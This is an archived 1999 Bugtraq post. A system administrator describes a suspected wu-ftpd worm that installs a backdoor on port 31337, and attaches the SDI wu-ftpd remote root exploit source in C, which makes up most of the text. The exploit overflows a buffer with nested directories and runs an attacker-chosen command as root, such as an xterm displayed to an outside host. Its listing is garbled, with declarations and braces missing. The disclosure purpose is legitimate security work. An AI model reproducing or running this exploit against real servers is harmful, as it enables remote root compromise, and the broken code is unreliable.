Possible WU-ftpd Worm ?
Date: Wed, 14 Apr 1999 02:19:17 -0300
From: Stu Alchor <stu@UPD.CEFETSP.BR>
To: BUGTRAQ@netspace.org
Subject: Possible WU-ftpd Worm ?
I'm a system administrator of a educational domain which deals with
information and technology. During the last 2 weeks, a our network have
been acting very weird, with a lot of traffic in one of our main machines.
By joining our computer response team, we've soon identified a intruder
activity, who was running scripts and exploiting another hosts around.
But what took my attention is that he had a script called ftp-w0rm.tgz
which was able to look for ftpd bug around the world, exploit it and
reproduce the script like the worm. We found out that once the worm gets
in a new host, it will install a backdoor (bindcode) in the port 31337
and starts the new scan. By taking a look at the time stamp, the intruder
is running this toy since march.
As I've run the old ftp exploit I found in the bugtraq and they didn't
work so I thought we were not vulnerable. I will attach the core of the
ftp worm (SDI-wu.c), the exploit for the vulnerability, which, btw, worked
in my host.
I will not include the source for the worm. Our computer response team have
been contacted to verify the code.
-- Begin of file --
* SDI wu-ftpd exploit for Linux (Feb 20, 1999)
* http://www.sekure.org - Brazilian Information Security Team.
* Source by jamez (jamez@sekure.org)
* c0nd0r (condor@sekure.org)
* This source will let you execute remote commands as root if you have
* write access on the ftp server.
* Usage:
* gcc SDI-wu.c -o SDI-wu
* ./SDI-wu host user password dir command type [port] [align]
* host: the victim (ftp.microsoft.com)
* user: ftp user with write access (anonymous)
* password: the password for the user (foo@bar.com)
* dir: the directory you have access (/incoming)
* command: the command ("/usr/X11R6/bin/xterm -display www.host.com:0")
* type: system type (see below)
* port: ftp port (21 default)
* align: the alignment (default 3)
* Limitations:
* because I've used hard coded address's for system and the command,
* the values wont be the same in others compilations of wu-ftpd.
* so, you will need to find the address for the version
* you want to exploit.
* because we are not using the stack to put our code, the exploit
* will work as well against a non-executable stack patch.
* RECOMENDATION = Please, run gdb through the wu.ftpd binary in order to
* find out your "system address" (ie: print system) and write it down
* so you can have more address to try - just overwrite the default addr
* and choose type (3).
* Thanks for the sekure SDI:
* fcon, bishop, dumped, bahamas, slide, vader, yuckfoo.
* Also thanks for #uground (irc.brasnet.org) and
* chaosmaker, c_orb(efnet)
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdio.h>
#include <arpa/inet.h>
#define MAXLEN 255
#define BSIZE 1024
struct sockaddr_in sa;
struct hostent *he;
char c = 'A';
char host[255],
int sd,
offset = 0,
dirsize = 0,
doit = 0,
done = 0,
todo = 0,
align = 3,
tipo = 0;
#define SYSADDR 0x40043194;
#define EGGADDR 0x805f1dc;
long systemaddr;
long shelladdr;
void usage(char * s) {
printf(" \nSDI wu-ftpd remote exploit (http://www.sekure.org)\n\n");
printf(" %s host user password dir command [port] [align]\n\n", s);
printf(" host: the victim (ftp.microsoft.com)\n");
printf(" user: ftp user with write access (anonymous)\n");
printf(" password: the password for the user (foo@bar.com)\n");
printf(" dir: the directory you have permission to write (/incoming)\n");
printf(" command: the command (\"/usr/X11R6/bin/xterm -display www.host.com:0\")\n");
printf(" type: see below\n");
printf(" port: ftp port (21 default)\n");
printf(" align: the alignment (3 default)\n");
printf("\n type:\n 0 - slak3.4 ver 2.4(4)\n 1 - slak3.4 ver beta-15&18");
printf("\n 2 - slak3.3 ver 2.4(2)");
printf("\n 3 - custom (change the code)\n\n See Netect advisory - ");
printf(" this is not suppose to be released soon! (Feb,1999)\n\n");
void get_dirsize() {
strcpy ( tmp, "PWD"); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
for(i = 0; i < strlen(netbuf); i++)
if(netbuf[i] == '\"') break;
dirsize = 0;
for(i++; i < strlen(netbuf); i++)
if(netbuf[i] == '\"')
bzero ( &netbuf, sizeof(netbuf));
int main (int argc, char *argv[]) {
if (argc < 7) {
sprintf(host, "%s", argv[1]);
sprintf(user, "%s", argv[2]);
sprintf(pass, "%s", argv[3]);
sprintf(dir, "%s", argv[4]);
sprintf(command, "%s", argv[5]);
tipo = atoi (argv[6]);
printf ( "%d\n\n", tipo);
if ( argc > 7) port = atoi(argv[7]);
if ( argc > 8) align = atoi(argv[8]);
if (tipo <= 0) {
/* 2.4(4) libc5 slack 3.4 */
systemaddr = 0x400441f0;
shelladdr = 0x80604a0;
} else if (tipo == 1) {
/* beta 15 libc5 slack 3.4 */
systemaddr = 0x400441f0;
shelladdr = 0x8062510;
} else if (tipo == 2) {
/* 2.4(4) libc5 slack 3.3 */
systemaddr = 0x400441f0;
shelladdr = 0x805f1e4;
} else {
systemaddr = SYSADDR;
shelladdr = EGGADDR;
sd = socket ( AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
he = gethostbyname (host);
if (!he) {
if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
printf ( "wrong ip address or unknown hostname\n"); exit(0);
else {
bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
printf ( "Cannot connect to remote host: Connection refused\n");
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
/* ok. we're connected. */
strcpy ( tmp, "USER "); strcat (tmp, user); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
/* ok. send the pass. */
strcpy ( tmp, "PASS "); strcat (tmp, pass); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[0] == '5') {
printf ("Login incorrect!\n"); exit(0); }
printf ( "%s\n", netbuf);
#ifdef DEBUG
printf ( "Ok, we're on! Press any key to exploit it\n");
bzero ( &netbuf, sizeof(netbuf));
/* ok. let's get to the vulnerable dir */
strcpy ( tmp, "CWD "); strcat (tmp, dir); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
read ( sd, netbuf, sizeof(netbuf));
printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
get_dirsize(); /* gets home dir size */
todo = BSIZE - dirsize - 60 - 4;
/* ok, we're on. let's get things working here! */
while(done < todo) {
if((todo - done) > 255)
doit = 255;
doit = todo - done;
for (i = 0; i < doit; i++)
buff[i] = c;
buff[doit] = '\0';
strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[1] == '2') {
printf ("error while creating the dir, let's try another name...\n\n");
done += doit;
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
strcpy ( tmp, "CWD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
if ( netbuf[0] == '5') {
printf ("error while exploiting the remote host: Cannot cd dir!\n\n");
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
/* prepare last one */
memset(buff, 'X', MAXLEN);
for(i = align; i < 100; i += 4) {
buff[i ] = systemaddr & 0x000000ff;
buff[i+1] = (systemaddr & 0x0000ff00) >> 8;
buff[i+2] = (systemaddr & 0x00ff0000) >> 16;
buff[i+3] = (systemaddr & 0xff000000) >> 24;
buff[i++] = shelladdr & 0x000000ff;
buff[i++] = (shelladdr & 0x0000ff00) >> 8;
buff[i++] = (shelladdr & 0x00ff0000) >> 16;
buff[i++] = (shelladdr & 0xff000000) >> 24;
strcat(command, ";");
memcpy(buff+140, command, strlen(command));
buff[MAXLEN] = '\0';
strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n");
write ( sd, tmp, strlen(tmp));
read ( sd, netbuf, sizeof(netbuf));
bzero ( &tmp, sizeof(tmp)); bzero ( &netbuf, sizeof(netbuf));
/* ok. */
printf ( "Exploiting %s\n", dir);
printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port);
printf("\nI guess you're a hax0r now :D.\n");
close (sd);
-- End of File (SDI-wu.c) --
Stu A. - SysADM of Sao Paulo Technical College
E-mail stu@cefetsp.br Fone +5511-37601201
stu@hotmail.com Sao Paulo - Brazil